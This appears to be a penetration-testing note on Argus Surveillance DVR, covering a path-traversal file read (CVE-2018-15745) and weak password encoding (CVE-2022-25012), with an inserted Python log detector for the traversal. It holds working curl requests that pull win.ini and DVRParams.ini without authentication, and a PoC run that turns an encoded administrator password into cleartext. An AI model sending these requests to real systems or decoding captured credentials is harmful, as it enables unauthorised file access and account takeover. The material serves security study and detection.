Argus Surveillance DVR
Argus Surveillance DVR is a Windows-based video surveillance application developed by PY Software for converting computers into security monitoring systems. It provides functionality for capturing video from IP cameras, webcams, and other sources, storing recordings locally, and offering remote access capabilities through a built-in web server. Configuration is stored in local .ini files under the ProgramData directory, where settings such as user accounts, camera streams, and operational parameters are defined.
The application integrates scheduling, motion detection, and multi-camera support, making it a popular choice for small businesses and home users seeking low-cost surveillance solutions. Remote access is exposed via an HTTP interface that allows configuration management and video streaming.
LFI
Argus Surveillance DVR version 4.0.0.0 is affected by a directory traversal vulnerability (CVE-2018-15745) due to insufficient sanitization of the RESULTPAGE parameter in WEBACCOUNT.CGI. This flaw allows unauthenticated attackers to supply path traversal sequences, enabling retrieval of arbitrary files from the host file system, including configuration files and private keys. The vulnerability arises because the CGI script does not properly validate or restrict input, allowing navigation outside the intended directory.
The DVRParams.ini file contains some configuration settings and is typically located at C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini.
$ curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fwin.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" -
# Configuration file
$ curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f..%5cprogramdata%5cPY_Software%5cArgus+surveillance+dvr%5cdvrparams.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" --proxy 127.0.0.1:8080
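Added example (not part of the original page or the vendor's code): a log check for the traversal described above, flagging WEBACCOUNT.CGI requests whose RESULTPAGE value leaves the web root after repeated percent-decoding. It assumes Common Log Format request lines from a reverse proxy or sensor in front of the DVR; the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines (assumed Common Log Format, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=Welcome.html&USEREDIRECT=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /WEBACCOUNT.CGI?RESULTPAGE=..%2F..%2F..%2FWindows%2Fwin.ini&USEREDIRECT=1 HTTP/1.1" 200 92',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /webaccount.cgi?resultpage=..%2f..%5cprogramdata%5cPY_Software%5cArgus+surveillance+dvr%5cdvrparams.ini HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /WEBACCOUNT.CGI?RESULTPAGE=%252e%252e%252fWindows%252fwin.ini HTTP/1.1" 200 92',
    '10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded sequences (%252e) are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True for a '..' path segment, an absolute path, or a drive letter."""
    path = fully_decode(value).replace("\\", "/")  # Windows accepts both separators
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return True
    return ".." in path.split("/")


def suspicious_requests(log_lines):
    """Return (line_number, decoded RESULTPAGE) for each traversal attempt."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # Case-insensitive matching is a conservative assumption for a Windows host.
        if not url.path.upper().endswith("/WEBACCOUNT.CGI"):
            continue
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key.upper() == "RESULTPAGE" and is_traversal(val):
                hits.append((lineno, fully_decode(val)))
    return hits
```

A hit that names dvrparams.ini means the stored account passwords should be treated as disclosed and rotated.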
Decryption
Argus Surveillance DVR version 4.0 is affected by a weak password encryption vulnerability (CVE-2022-25012) due to the use of insecure cryptographic methods for storing user credentials. The application does not adequately protect passwords, making them susceptible to offline recovery or brute-force attacks if configuration files or databases are accessed. The DVRParams.ini file contains the users' login details. A Python-based working PoC is available:
$ cat DVRParams.ini | grep -i "^password"
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8 # Administrator
$ python3 CVE-2022-25012.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
[+] Password: 14WatchD0g$